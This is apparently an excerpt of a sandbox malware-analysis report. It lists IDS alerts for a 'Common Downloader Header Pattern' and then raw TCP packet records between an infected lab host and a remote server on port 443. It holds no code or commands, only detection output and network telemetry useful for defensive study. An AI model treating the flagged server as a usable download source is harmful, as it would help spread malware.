                                                                                    2024-11-08T11:29:31.602047+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.11.3049765104.21.86.219443TCP
                                                                                    2024-11-08T11:29:33.950439+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.11.3049767104.21.86.219443TCP
                                                                                    2024-11-08T11:29:35.875121+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.11.3049769104.21.86.219443TCP
                                                                                    2024-11-08T11:29:59.577958+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.11.3049783104.21.86.219443TCP
                                                                                    2024-11-08T11:31:00.937892+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.11.3049789104.21.86.219443TCP
                                                                                    2024-11-08T11:31:45.392835+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.11.3049795104.21.86.219443TCP

                                                                                    Network Port Distribution

                                                                                    TCP Packets

                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                    Nov 8, 2024 11:29:28.224639893 CET49764443192.168.11.30104.21.86.219
                                                                                    Nov 8, 2024 11:29:28.224663973 CET44349764104.21.86.219192.168.11.30
                                                                                    Nov 8, 2024 11:29:28.224921942 CET49764443192.168.11.30104.21.86.219
                                                                                    Nov 8, 2024 11:29:28.233688116 CET49764443192.168.11.30104.21.86.219
                                                                                    Nov 8, 2024 11:29:28.233704090 CET44349764104.21.86.219192.168.11.30
                                                                                    Nov 8, 2024 11:29:28.451021910 CET44349764104.21.86.219192.168.11.30
                                                                                    Nov 8, 2024 11:29:28.451334953 CET49764443192.168.11.30104.21.86.219
                                                                                    Nov 8, 2024 11:29:28.455895901 CET49764443192.168.11.30104.21.86.219
                                                                                    Nov 8, 2024 11:29:28.455904007 CET44349764104.21.86.219192.168.11.30
                                                                                    Nov 8, 2024 11:29:28.456136942 CET44349764104.21.86.219192.168.11.30
                                                                                    Nov 8, 2024 11:29:28.465517044 CET49764443192.168.11.30104.21.86.219
                                                                                    Nov 8, 2024 11:29:28.508006096 CET44349764104.21.86.219192.168.11.30
                                                                                    Nov 8, 2024 11:29:29.280333996 CET44349764104.21.86.219192.168.11.30
                                                                                    Nov 8, 2024 11:29:29.280385971 CET44349764104.21.86.219192.168.11.30
                                                                                    Nov 8, 2024 11:29:29.280441999 CET44349764104.21.86.219192.168.11.30
                                                                                    Nov 8, 2024 11:29:29.280476093 CET44349764104.21.86.219192.168.11.30
                                                                                    Nov 8, 2024 11:29:29.280675888 CET49764443192.168.11.30104.21.86.219
                                                                                    Nov 8, 2024 11:29:29.280690908 CET44349764104.21.86.219192.168.11.30
                                                                                    Nov 8, 2024 11:29:29.323101997 CET49764443192.168.11.30104.21.86.219
                                                                                    Nov 8, 2024 11:29:29.523933887 CET44349764104.21.86.219192.168.11.30
                                                                                    Nov 8, 2024 11:29:29.524064064 CET44349764104.21.86.219192.168.11.30
                                                                                    Nov 8, 2024 11:29:29.524328947 CET49764443192.168.11.30104.21.86.219
                                                                                    Nov 8, 2024 11:29:29.533643007 CET49764443192.168.11.30104.21.86.219
                                                                                    Nov 8, 2024 11:29:30.563241959 CET49765443192.168.11.30104.21.86.219
                                                                                    Nov 8, 2024 11:29:30.563261032 CET44349765104.21.86.219192.168.11.30
                                                                                    Nov 8, 2024 11:29:30.563525915 CET49765443192.168.11.30104.21.86.219
                                                                                    Nov 8, 2024 11:29:30.563874960 CET49765443192.168.11.30104.21.86.219
                                                                                    Nov 8, 2024 11:29:30.563882113 CET44349765104.21.86.219192.168.11.30
                                                                                    Nov 8, 2024 11:29:30.773051023 CET44349765104.21.86.219192.168.11.30
                                                                                    Nov 8, 2024 11:29:30.774601936 CET49765443192.168.11.30104.21.86.219
                                                                                    Nov 8, 2024 11:29:30.774610043 CET44349765104.21.86.219192.168.11.30
                                                                                    Nov 8, 2024 11:29:31.602025986 CET44349765104.21.86.219192.168.11.30
                                                                                    Nov 8, 2024 11:29:31.602051020 CET44349765104.21.86.219192.168.11.30
                                                                                    Nov 8, 2024 11:29:31.602096081 CET44349765104.21.86.219192.168.11.30
                                                                                    Nov 8, 2024 11:29:31.602109909 CET44349765104.21.86.219192.168.11.30
                                                                                    Nov 8, 2024 11:29:31.602377892 CET49765443192.168.11.30104.21.86.219
                                                                                    Nov 8, 2024 11:29:31.602377892 CET49765443192.168.11.30104.21.86.219
                                                                                    Nov 8, 2024 11:29:31.615411043 CET49765443192.168.11.30104.21.86.219
                                                                                    Nov 8, 2024 11:29:31.743750095 CET49766443192.168.11.30104.21.86.219
                                                                                    Nov 8, 2024 11:29:31.743784904 CET44349766104.21.86.219192.168.11.30
                                                                                    Nov 8, 2024 11:29:31.743995905 CET49766443192.168.11.30104.21.86.219
                                                                                    Nov 8, 2024 11:29:31.744193077 CET49766443192.168.11.30104.21.86.219
                                                                                    Nov 8, 2024 11:29:31.744209051 CET44349766104.21.86.219192.168.11.30
                                                                                    Nov 8, 2024 11:29:31.993808985 CET44349766104.21.86.219192.168.11.30
                                                                                    Nov 8, 2024 11:29:31.994791985 CET49766443192.168.11.30104.21.86.219
                                                                                    Nov 8, 2024 11:29:31.994818926 CET44349766104.21.86.219192.168.11.30
                                                                                    Nov 8, 2024 11:29:31.994973898 CET49766443192.168.11.30104.21.86.219
                                                                                    Nov 8, 2024 11:29:31.994995117 CET44349766104.21.86.219192.168.11.30
                                                                                    Nov 8, 2024 11:29:32.875943899 CET44349766104.21.86.219192.168.11.30
                                                                                    Nov 8, 2024 11:29:32.876015902 CET44349766104.21.86.219192.168.11.30
                                                                                    Nov 8, 2024 11:29:32.876187086 CET49766443192.168.11.30104.21.86.219
                                                                                    Nov 8, 2024 11:29:32.876501083 CET49766443192.168.11.30104.21.86.219
                                                                                    Nov 8, 2024 11:29:32.924779892 CET49767443192.168.11.30104.21.86.219
                                                                                    Nov 8, 2024 11:29:32.924818993 CET44349767104.21.86.219192.168.11.30
                                                                                    Nov 8, 2024 11:29:32.925102949 CET49767443192.168.11.30104.21.86.219
                                                                                    Nov 8, 2024 11:29:32.925508976 CET49767443192.168.11.30104.21.86.219
                                                                                    Nov 8, 2024 11:29:32.925527096 CET44349767104.21.86.219192.168.11.30
                                                                                    Nov 8, 2024 11:29:33.138446093 CET44349767104.21.86.219192.168.11.30
                                                                                    Nov 8, 2024 11:29:33.140525103 CET49767443192.168.11.30104.21.86.219
                                                                                    Nov 8, 2024 11:29:33.140542984 CET44349767104.21.86.219192.168.11.30
                                                                                    Nov 8, 2024 11:29:33.950414896 CET44349767104.21.86.219192.168.11.30
                                                                                    Nov 8, 2024 11:29:33.950453997 CET44349767104.21.86.219192.168.11.30
                                                                                    Nov 8, 2024 11:29:33.950489044 CET44349767104.21.86.219192.168.11.30
                                                                                    Nov 8, 2024 11:29:33.950527906 CET44349767104.21.86.219192.168.11.30
                                                                                    Nov 8, 2024 11:29:33.950680971 CET49767443192.168.11.30104.21.86.219
                                                                                    Nov 8, 2024 11:29:33.971982002 CET49767443192.168.11.30104.21.86.219
                                                                                    Nov 8, 2024 11:29:34.008873940 CET49768443192.168.11.30104.21.86.219
                                                                                    Nov 8, 2024 11:29:34.008897066 CET44349768104.21.86.219192.168.11.30
                                                                                    Nov 8, 2024 11:29:34.009215117 CET49768443192.168.11.30104.21.86.219
                                                                                    Nov 8, 2024 11:29:34.009480953 CET49768443192.168.11.30104.21.86.219
                                                                                    Nov 8, 2024 11:29:34.009493113 CET44349768104.21.86.219192.168.11.30
                                                                                    Nov 8, 2024 11:29:34.220206022 CET44349768104.21.86.219192.168.11.30
                                                                                    Nov 8, 2024 11:29:34.221137047 CET49768443192.168.11.30104.21.86.219
                                                                                    Nov 8, 2024 11:29:34.221149921 CET44349768104.21.86.219192.168.11.30
                                                                                    Nov 8, 2024 11:29:34.221470118 CET49768443192.168.11.30104.21.86.219
                                                                                    Nov 8, 2024 11:29:34.221479893 CET44349768104.21.86.219192.168.11.30
                                                                                    Nov 8, 2024 11:29:35.049582005 CET44349768104.21.86.219192.168.11.30
                                                                                    Nov 8, 2024 11:29:35.049649954 CET44349768104.21.86.219192.168.11.30
                                                                                    Nov 8, 2024 11:29:35.049813032 CET49768443192.168.11.30104.21.86.219
                                                                                    Nov 8, 2024 11:29:35.050101042 CET49768443192.168.11.30104.21.86.219
                                                                                    Nov 8, 2024 11:29:35.072385073 CET49769443192.168.11.30104.21.86.219
                                                                                    Nov 8, 2024 11:29:35.072453022 CET44349769104.21.86.219192.168.11.30
                                                                                    Nov 8, 2024 11:29:35.072609901 CET49769443192.168.11.30104.21.86.219
                                                                                    Nov 8, 2024 11:29:35.072807074 CET49769443192.168.11.30104.21.86.219
                                                                                    Nov 8, 2024 11:29:35.072824955 CET44349769104.21.86.219192.168.11.30
                                                                                    Nov 8, 2024 11:29:35.293468952 CET44349769104.21.86.219192.168.11.30
                                                                                    Nov 8, 2024 11:29:35.294693947 CET49769443192.168.11.30104.21.86.219
                                                                                    Nov 8, 2024 11:29:35.294714928 CET44349769104.21.86.219192.168.11.30
                                                                                    Nov 8, 2024 11:29:35.875147104 CET44349769104.21.86.219192.168.11.30
                                                                                    Nov 8, 2024 11:29:35.875210047 CET44349769104.21.86.219192.168.11.30
                                                                                    Nov 8, 2024 11:29:35.875253916 CET44349769104.21.86.219192.168.11.30
                                                                                    Nov 8, 2024 11:29:35.875291109 CET44349769104.21.86.219192.168.11.30
                                                                                    Nov 8, 2024 11:29:35.875365973 CET44349769104.21.86.219192.168.11.30
                                                                                    Nov 8, 2024 11:29:35.875451088 CET49769443192.168.11.30104.21.86.219
                                                                                    Nov 8, 2024 11:29:35.875643969 CET49769443192.168.11.30104.21.86.219
                                                                                    Nov 8, 2024 11:29:35.875653982 CET44349769104.21.86.219192.168.11.30
                                                                                    Nov 8, 2024 11:29:35.875832081 CET49769443192.168.11.30104.21.86.219
                                                                                    Nov 8, 2024 11:29:35.875850916 CET44349769104.21.86.219192.168.11.30
                                                                                    Nov 8, 2024 11:29:35.875853062 CET44349769104.21.86.219192.168.11.30
                                                                                    Nov 8, 2024 11:29:35.876028061 CET49769443192.168.11.30104.21.86.219
                                                                                    Nov 8, 2024 11:29:35.876221895 CET49769443192.168.11.30104.21.86.219
                                                                                    Nov 8, 2024 11:29:35.876308918 CET44349769104.21.86.219192.168.11.30
                                                                                    Nov 8, 2024 11:29:35.876373053 CET44349769104.21.86.219192.168.11.30
                                                                                    Nov 8, 2024 11:29:35.876472950 CET44349769104.21.86.219192.168.11.30
                                                                                    Nov 8, 2024 11:29:35.876805067 CET49769443192.168.11.30104.21.86.219
                                                                                    Nov 8, 2024 11:29:35.876805067 CET49769443192.168.11.30104.21.86.219
                                                                                    Nov 8, 2024 11:29:35.975524902 CET49769443192.168.11.30104.21.86.219
                                                                                    Nov 8, 2024 11:29:36.589272976 CET49770443192.168.11.30104.21.86.219
                                                                                    Nov 8, 2024 11:29:36.589299917 CET44349770104.21.86.219192.168.11.30
                                                                                    Nov 8, 2024 11:29:36.589560986 CET49770443192.168.11.30104.21.86.219
                                                                                    Nov 8, 2024 11:29:36.589745045 CET49770443192.168.11.30104.21.86.219
                                                                                    Nov 8, 2024 11:29:36.589752913 CET44349770104.21.86.219192.168.11.30
                                                                                    Nov 8, 2024 11:29:36.838651896 CET44349770104.21.86.219192.168.11.30
                                                                                    Nov 8, 2024 11:29:36.840004921 CET49770443192.168.11.30104.21.86.219
                                                                                    Nov 8, 2024 11:29:36.840018034 CET44349770104.21.86.219192.168.11.30
                                                                                    Nov 8, 2024 11:29:36.840348959 CET49770443192.168.11.30104.21.86.219
                                                                                    Nov 8, 2024 11:29:36.840356112 CET44349770104.21.86.219192.168.11.30
                                                                                    Nov 8, 2024 11:29:37.658235073 CET44349770104.21.86.219192.168.11.30
                                                                                    Nov 8, 2024 11:29:37.658313036 CET44349770104.21.86.219192.168.11.30
                                                                                    Nov 8, 2024 11:29:37.658477068 CET49770443192.168.11.30104.21.86.219
                                                                                    Nov 8, 2024 11:29:37.658727884 CET49770443192.168.11.30104.21.86.219
                                                                                    Nov 8, 2024 11:29:37.742729902 CET49771443192.168.11.30104.21.86.219
                                                                                    Nov 8, 2024 11:29:37.742748976 CET44349771104.21.86.219192.168.11.30
                                                                                    Nov 8, 2024 11:29:37.743210077 CET49771443192.168.11.30104.21.86.219
                                                                                    Nov 8, 2024 11:29:37.743386030 CET49771443192.168.11.30104.21.86.219
                                                                                    Nov 8, 2024 11:29:37.743392944 CET44349771104.21.86.219192.168.11.30
                                                                                    Nov 8, 2024 11:29:37.952331066 CET44349771104.21.86.219192.168.11.30
                                                                                    Nov 8, 2024 11:29:37.953226089 CET49771443192.168.11.30104.21.86.219
                                                                                    Nov 8, 2024 11:29:37.953234911 CET44349771104.21.86.219192.168.11.30
                                                                                    Nov 8, 2024 11:29:37.953396082 CET49771443192.168.11.30104.21.86.219
                                                                                    Nov 8, 2024 11:29:37.953401089 CET44349771104.21.86.219192.168.11.30
                                                                                    Nov 8, 2024 11:29:38.617021084 CET49772443192.168.11.30104.21.86.219
                                                                                    Nov 8, 2024 11:29:38.617083073 CET44349772104.21.86.219192.168.11.30
                                                                                    Nov 8, 2024 11:29:38.617280006 CET49772443192.168.11.30104.21.86.219
                                                                                    Nov 8, 2024 11:29:38.620367050 CET49772443192.168.11.30104.21.86.219
                                                                                    Nov 8, 2024 11:29:38.620379925 CET44349772104.21.86.219192.168.11.30
                                                                                    Nov 8, 2024 11:29:38.772811890 CET44349771104.21.86.219192.168.11.30
                                                                                    Nov 8, 2024 11:29:38.772991896 CET44349771104.21.86.219192.168.11.30
                                                                                    Nov 8, 2024 11:29:38.773199081 CET49771443192.168.11.30104.21.86.219
                                                                                    Nov 8, 2024 11:29:38.773502111 CET49771443192.168.11.30104.21.86.219
                                                                                    Nov 8, 2024 11:29:38.834197044 CET49773443192.168.11.30104.21.86.219
                                                                                    Nov 8, 2024 11:29:38.834213972 CET44349773104.21.86.219192.168.11.30
                                                                                    Nov 8, 2024 11:29:38.834419966 CET49773443192.168.11.30104.21.86.219
                                                                                    Nov 8, 2024 11:29:38.834626913 CET49773443192.168.11.30104.21.86.219
                                                                                    Nov 8, 2024 11:29:38.834638119 CET44349773104.21.86.219192.168.11.30
                                                                                    Nov 8, 2024 11:29:38.875477076 CET44349772104.21.86.219192.168.11.30
                                                                                    Nov 8, 2024 11:29:38.875747919 CET49772443192.168.11.30104.21.86.219
                                                                                    Nov 8, 2024 11:29:38.877316952 CET49772443192.168.11.30104.21.86.219
                                                                                    Nov 8, 2024 11:29:38.877326965 CET44349772104.21.86.219192.168.11.30
                                                                                    Nov 8, 2024 11:29:38.877566099 CET44349772104.21.86.219192.168.11.30
                                                                                    Nov 8, 2024 11:29:38.880621910 CET49772443192.168.11.30104.21.86.219
                                                                                    Nov 8, 2024 11:29:38.924010992 CET44349772104.21.86.219192.168.11.30
                                                                                    Nov 8, 2024 11:29:39.044902086 CET44349773104.21.86.219192.168.11.30
                                                                                    Nov 8, 2024 11:29:39.045907021 CET49773443192.168.11.30104.21.86.219
                                                                                    Nov 8, 2024 11:29:39.045913935 CET44349773104.21.86.219192.168.11.30
                                                                                    Nov 8, 2024 11:29:39.046087980 CET49773443192.168.11.30104.21.86.219
                                                                                    Nov 8, 2024 11:29:39.046097994 CET44349773104.21.86.219192.168.11.30
                                                                                    Nov 8, 2024 11:29:39.733761072 CET44349772104.21.86.219192.168.11.30
                                                                                    Nov 8, 2024 11:29:39.733805895 CET44349772104.21.86.219192.168.11.30
                                                                                    Nov 8, 2024 11:29:39.733824015 CET44349772104.21.86.219192.168.11.30
                                                                                    Nov 8, 2024 11:29:39.733861923 CET44349772104.21.86.219192.168.11.30
                                                                                    Nov 8, 2024 11:29:39.734231949 CET49772443192.168.11.30104.21.86.219
                                                                                    Nov 8, 2024 11:29:39.734240055 CET44349772104.21.86.219192.168.11.30
                                                                                    Nov 8, 2024 11:29:39.789478064 CET49772443192.168.11.30104.21.86.219
                                                                                    Nov 8, 2024 11:29:39.872416973 CET44349773104.21.86.219192.168.11.30
                                                                                    Nov 8, 2024 11:29:39.872457027 CET44349773104.21.86.219192.168.11.30
                                                                                    Nov 8, 2024 11:29:39.872598886 CET49773443192.168.11.30104.21.86.219
                                                                                    Nov 8, 2024 11:29:39.872838020 CET49773443192.168.11.30104.21.86.219
                                                                                    Nov 8, 2024 11:29:39.974564075 CET44349772104.21.86.219192.168.11.30
                                                                                    Nov 8, 2024 11:29:39.976460934 CET44349772104.21.86.219192.168.11.30
                                                                                    Nov 8, 2024 11:29:39.976675987 CET49772443192.168.11.30104.21.86.219
                                                                                    Nov 8, 2024 11:29:39.976716042 CET44349772104.21.86.219192.168.11.30
                                                                                    Nov 8, 2024 11:29:39.979496002 CET44349772104.21.86.219192.168.11.30
                                                                                    Nov 8, 2024 11:29:39.979808092 CET49772443192.168.11.30104.21.86.219
                                                                                    Nov 8, 2024 11:29:39.979829073 CET44349772104.21.86.219192.168.11.30
                                                                                    Nov 8, 2024 11:29:39.982413054 CET44349772104.21.86.219192.168.11.30
                                                                                    Nov 8, 2024 11:29:39.982538939 CET44349772104.21.86.219192.168.11.30
                                                                                    Nov 8, 2024 11:29:39.982733011 CET49772443192.168.11.30104.21.86.219
                                                                                    Nov 8, 2024 11:29:39.982923031 CET49772443192.168.11.30104.21.86.219
                                                                                    Nov 8, 2024 11:29:39.983416080 CET49772443192.168.11.30104.21.86.219
                                                                                    Nov 8, 2024 11:29:43.362768888 CET49777443192.168.11.30104.21.86.219
                                                                                    Nov 8, 2024 11:29:43.362844944 CET44349777104.21.86.219192.168.11.30
                                                                                    Nov 8, 2024 11:29:43.363003016 CET49777443192.168.11.30104.21.86.219
                                                                                    Nov 8, 2024 11:29:43.366539955 CET49777443192.168.11.30104.21.86.219
                                                                                    Nov 8, 2024 11:29:43.366547108 CET44349777104.21.86.219192.168.11.30
                                                                                    Nov 8, 2024 11:29:43.591687918 CET44349777104.21.86.219192.168.11.30
                                                                                    Nov 8, 2024 11:29:43.591936111 CET49777443192.168.11.30104.21.86.219
                                                                                    Nov 8, 2024 11:29:43.594255924 CET49777443192.168.11.30104.21.86.219
                                                                                    Nov 8, 2024 11:29:43.594263077 CET44349777104.21.86.219192.168.11.30
                                                                                    Nov 8, 2024 11:29:43.594500065 CET44349777104.21.86.219192.168.11.30
                                                                                    Nov 8, 2024 11:29:43.599044085 CET49777443192.168.11.30104.21.86.219
                                                                                    Nov 8, 2024 11:29:43.639961004 CET44349777104.21.86.219192.168.11.30
                                                                                    Nov 8, 2024 11:29:44.407011986 CET44349777104.21.86.219192.168.11.30
                                                                                    Nov 8, 2024 11:29:44.407054901 CET44349777104.21.86.219192.168.11.30
                                                                                    Nov 8, 2024 11:29:44.407082081 CET44349777104.21.86.219192.168.11.30
                                                                                    Nov 8, 2024 11:29:44.407104015 CET44349777104.21.86.219192.168.11.30
                                                                                    Nov 8, 2024 11:29:44.407334089 CET49777443192.168.11.30104.21.86.219
                                                                                    Nov 8, 2024 11:29:44.407334089 CET49777443192.168.11.30104.21.86.219
                                                                                    Nov 8, 2024 11:29:44.407351017 CET44349777104.21.86.219192.168.11.30
                                                                                    Nov 8, 2024 11:29:44.460398912 CET49777443192.168.11.30104.21.86.219
                                                                                    Nov 8, 2024 11:29:44.460411072 CET44349777104.21.86.219192.168.11.30
                                                                                    Nov 8, 2024 11:29:44.507124901 CET49777443192.168.11.30104.21.86.219
                                                                                    Nov 8, 2024 11:29:44.646998882 CET44349777104.21.86.219192.168.11.30
                                                                                    Nov 8, 2024 11:29:44.647070885 CET44349777104.21.86.219192.168.11.30
                                                                                    Nov 8, 2024 11:29:44.647102118 CET44349777104.21.86.219192.168.11.30
                                                                                    Nov 8, 2024 11:29:44.647378922 CET49777443192.168.11.30104.21.86.219
                                                                                    Nov 8, 2024 11:29:44.647388935 CET44349777104.21.86.219192.168.11.30
                                                                                    Nov 8, 2024 11:29:44.647574902 CET49777443192.168.11.30104.21.86.219
                                                                                    Nov 8, 2024 11:29:44.647583008 CET44349777104.21.86.219192.168.11.30
                                                                                    Nov 8, 2024 11:29:44.647593021 CET44349777104.21.86.219192.168.11.30
                                                                                    Nov 8, 2024 11:29:44.647768974 CET44349777104.21.86.219192.168.11.30
                                                                                    Nov 8, 2024 11:29:44.647814989 CET49777443192.168.11.30104.21.86.219
                                                                                    Nov 8, 2024 11:29:44.647984982 CET49777443192.168.11.30104.21.86.219
                                                                                    Nov 8, 2024 11:29:44.692239046 CET49777443192.168.11.30104.21.86.219
                                                                                    Nov 8, 2024 11:29:44.872411966 CET49779443192.168.11.30104.21.86.219
                                                                                    Nov 8, 2024 11:29:44.872436047 CET44349779104.21.86.219192.168.11.30
                                                                                    Nov 8, 2024 11:29:44.872646093 CET49779443192.168.11.30104.21.86.219
                                                                                    Nov 8, 2024 11:29:44.873100042 CET49779443192.168.11.30104.21.86.219
                                                                                    Nov 8, 2024 11:29:44.873112917 CET44349779104.21.86.219192.168.11.30
                                                                                    Nov 8, 2024 11:29:45.083538055 CET44349779104.21.86.219192.168.11.30
                                                                                    Nov 8, 2024 11:29:45.084919930 CET49779443192.168.11.30104.21.86.219
                                                                                    Nov 8, 2024 11:29:45.084939957 CET44349779104.21.86.219192.168.11.30
                                                                                    Nov 8, 2024 11:29:45.085283995 CET49779443192.168.11.30104.21.86.219
                                                                                    Nov 8, 2024 11:29:45.085299015 CET44349779104.21.86.219192.168.11.30
                                                                                    Nov 8, 2024 11:29:45.930835962 CET44349779104.21.86.219192.168.11.30
                                                                                    Nov 8, 2024 11:29:45.930908918 CET44349779104.21.86.219192.168.11.30
                                                                                    Nov 8, 2024 11:29:45.931093931 CET49779443192.168.11.30104.21.86.219
                                                                                    Nov 8, 2024 11:29:45.931391001 CET49779443192.168.11.30104.21.86.219
                                                                                    Nov 8, 2024 11:29:57.370029926 CET49782443192.168.11.30104.21.86.219
                                                                                    Nov 8, 2024 11:29:57.370059013 CET44349782104.21.86.219192.168.11.30
                                                                                    Nov 8, 2024 11:29:57.370264053 CET49782443192.168.11.30104.21.86.219
                                                                                    Nov 8, 2024 11:29:57.370475054 CET49782443192.168.11.30104.21.86.219
                                                                                    Nov 8, 2024 11:29:57.370486975 CET44349782104.21.86.219192.168.11.30
                                                                                    Nov 8, 2024 11:29:57.581840992 CET44349782104.21.86.219192.168.11.30
                                                                                    Nov 8, 2024 11:29:57.583646059 CET49782443192.168.11.30104.21.86.219
                                                                                    Nov 8, 2024 11:29:57.583658934 CET44349782104.21.86.219192.168.11.30
                                                                                    Nov 8, 2024 11:29:57.583921909 CET49782443192.168.11.30104.21.86.219
                                                                                    Nov 8, 2024 11:29:57.583930016 CET44349782104.21.86.219192.168.11.30
                                                                                    Nov 8, 2024 11:29:58.439781904 CET44349782104.21.86.219192.168.11.30
                                                                                    Nov 8, 2024 11:29:58.439882994 CET44349782104.21.86.219192.168.11.30
                                                                                    Nov 8, 2024 11:29:58.440042019 CET49782443192.168.11.30104.21.86.219
                                                                                    Nov 8, 2024 11:29:58.440552950 CET49782443192.168.11.30104.21.86.219
                                                                                    Nov 8, 2024 11:29:58.484565973 CET49783443192.168.11.30104.21.86.219
                                                                                    Nov 8, 2024 11:29:58.484611034 CET44349783104.21.86.219192.168.11.30
                                                                                    Nov 8, 2024 11:29:58.484838009 CET49783443192.168.11.30104.21.86.219
                                                                                    Nov 8, 2024 11:29:58.485232115 CET49783443192.168.11.30104.21.86.219
                                                                                    Nov 8, 2024 11:29:58.485264063 CET44349783104.21.86.219192.168.11.30
                                                                                    Nov 8, 2024 11:29:58.713747978 CET44349783104.21.86.219192.168.11.30
                                                                                    Nov 8, 2024 11:29:58.714986086 CET49783443192.168.11.30104.21.86.219
                                                                                    Nov 8, 2024 11:29:58.715006113 CET44349783104.21.86.219192.168.11.30
                                                                                    Nov 8, 2024 11:29:59.577939987 CET44349783104.21.86.219192.168.11.30
                                                                                    Nov 8, 2024 11:29:59.577966928 CET44349783104.21.86.219192.168.11.30
                                                                                    Nov 8, 2024 11:29:59.578001022 CET44349783104.21.86.219192.168.11.30
                                                                                    Nov 8, 2024 11:29:59.578093052 CET44349783104.21.86.219192.168.11.30
                                                                                    Nov 8, 2024 11:29:59.578121901 CET49783443192.168.11.30104.21.86.219
                                                                                    Nov 8, 2024 11:29:59.578130007 CET44349783104.21.86.219192.168.11.30
                                                                                    Nov 8, 2024 11:29:59.578273058 CET49783443192.168.11.30104.21.86.219
                                                                                    Nov 8, 2024 11:29:59.808285952 CET44349783104.21.86.219192.168.11.30
                                                                                    Nov 8, 2024 11:29:59.808648109 CET44349783104.21.86.219192.168.11.30
                                                                                    Nov 8, 2024 11:29:59.808703899 CET44349783104.21.86.219192.168.11.30
                                                                                    Nov 8, 2024 11:29:59.808799028 CET49783443192.168.11.30104.21.86.219
                                                                                    Nov 8, 2024 11:29:59.808821917 CET44349783104.21.86.219192.168.11.30
                                                                                    Nov 8, 2024 11:29:59.808979988 CET49783443192.168.11.30104.21.86.219
                                                                                    Nov 8, 2024 11:29:59.809001923 CET44349783104.21.86.219192.168.11.30
                                                                                    Nov 8, 2024 11:29:59.809096098 CET44349783104.21.86.219192.168.11.30
                                                                                    Nov 8, 2024 11:29:59.809257984 CET49783443192.168.11.30104.21.86.219
                                                                                    Nov 8, 2024 11:29:59.809271097 CET44349783104.21.86.219192.168.11.30
                                                                                    Nov 8, 2024 11:29:59.809292078 CET44349783104.21.86.219192.168.11.30
                                                                                    Nov 8, 2024 11:29:59.809438944 CET49783443192.168.11.30104.21.86.219
                                                                                    Nov 8, 2024 11:29:59.809709072 CET44349783104.21.86.219192.168.11.30
                                                                                    Nov 8, 2024 11:29:59.862749100 CET49783443192.168.11.30104.21.86.219
                                                                                    Nov 8, 2024 11:30:00.047807932 CET44349783104.21.86.219192.168.11.30
                                                                                    Nov 8, 2024 11:30:00.047991037 CET44349783104.21.86.219192.168.11.30
                                                                                    Nov 8, 2024 11:30:00.048317909 CET49783443192.168.11.30104.21.86.219
                                                                                    Nov 8, 2024 11:30:00.048320055 CET44349783104.21.86.219192.168.11.30
                                                                                    Nov 8, 2024 11:30:00.048347950 CET44349783104.21.86.219192.168.11.30
                                                                                    Nov 8, 2024 11:30:00.048417091 CET44349783104.21.86.219192.168.11.30
                                                                                    Nov 8, 2024 11:30:00.048471928 CET49783443192.168.11.30104.21.86.219
                                                                                    Nov 8, 2024 11:30:00.048496008 CET44349783104.21.86.219192.168.11.30
                                                                                    Nov 8, 2024 11:30:00.048681021 CET49783443192.168.11.30104.21.86.219
                                                                                    Nov 8, 2024 11:30:00.048703909 CET44349783104.21.86.219192.168.11.30
                                                                                    Nov 8, 2024 11:30:00.048890114 CET49783443192.168.11.30104.21.86.219
                                                                                    Nov 8, 2024 11:30:00.049300909 CET44349783104.21.86.219192.168.11.30
                                                                                    Nov 8, 2024 11:30:00.049407005 CET44349783104.21.86.219192.168.11.30
                                                                                    Nov 8, 2024 11:30:00.049498081 CET44349783104.21.86.219192.168.11.30
                                                                                    Nov 8, 2024 11:30:00.049680948 CET49783443192.168.11.30104.21.86.219
                                                                                    Nov 8, 2024 11:30:00.049707890 CET44349783104.21.86.219192.168.11.30
                                                                                    Nov 8, 2024 11:30:00.049890041 CET49783443192.168.11.30104.21.86.219
                                                                                    Nov 8, 2024 11:30:00.050025940 CET44349783104.21.86.219192.168.11.30
                                                                                    Nov 8, 2024 11:30:00.097050905 CET49783443192.168.11.30104.21.86.219
                                                                                    Nov 8, 2024 11:30:00.097083092 CET44349783104.21.86.219192.168.11.30
                                                                                    Nov 8, 2024 11:30:00.143882036 CET49783443192.168.11.30104.21.86.219
                                                                                    Nov 8, 2024 11:30:00.289849997 CET44349783104.21.86.219192.168.11.30
                                                                                    Nov 8, 2024 11:30:00.289990902 CET44349783104.21.86.219192.168.11.30
                                                                                    Nov 8, 2024 11:30:00.290097952 CET44349783104.21.86.219192.168.11.30
                                                                                    Nov 8, 2024 11:30:00.290174961 CET49783443192.168.11.30104.21.86.219
                                                                                    Nov 8, 2024 11:30:00.290189028 CET44349783104.21.86.219192.168.11.30
                                                                                    Nov 8, 2024 11:30:00.290303946 CET44349783104.21.86.219192.168.11.30
                                                                                    Nov 8, 2024 11:30:00.290395975 CET49783443192.168.11.30104.21.86.219
                                                                                    Nov 8, 2024 11:30:00.294630051 CET44349783104.21.86.219192.168.11.30
                                                                                    Nov 8, 2024 11:30:00.294713974 CET44349783104.21.86.219192.168.11.30
                                                                                    Nov 8, 2024 11:30:00.294817924 CET44349783104.21.86.219192.168.11.30
                                                                                    Nov 8, 2024 11:30:00.294867039 CET49783443192.168.11.30104.21.86.219
                                                                                    Nov 8, 2024 11:30:00.295011044 CET44349783104.21.86.219192.168.11.30
                                                                                    Nov 8, 2024 11:30:00.295022011 CET49783443192.168.11.30104.21.86.219
                                                                                    Nov 8, 2024 11:30:00.295028925 CET44349783104.21.86.219192.168.11.30
                                                                                    Nov 8, 2024 11:30:00.295185089 CET44349783104.21.86.219192.168.11.30
                                                                                    Nov 8, 2024 11:30:00.295193911 CET49783443192.168.11.30104.21.86.219
                                                                                    Nov 8, 2024 11:30:00.295200109 CET44349783104.21.86.219192.168.11.30
                                                                                    Nov 8, 2024 11:30:00.295361996 CET49783443192.168.11.30104.21.86.219
                                                                                    Nov 8, 2024 11:30:00.295399904 CET44349783104.21.86.219192.168.11.30
                                                                                    Nov 8, 2024 11:30:00.295593023 CET49783443192.168.11.30104.21.86.219
                                                                                    Nov 8, 2024 11:30:00.526606083 CET44349783104.21.86.219192.168.11.30
                                                                                    Nov 8, 2024 11:30:00.526843071 CET44349783104.21.86.219192.168.11.30
                                                                                    Nov 8, 2024 11:30:00.526875019 CET49783443192.168.11.30104.21.86.219
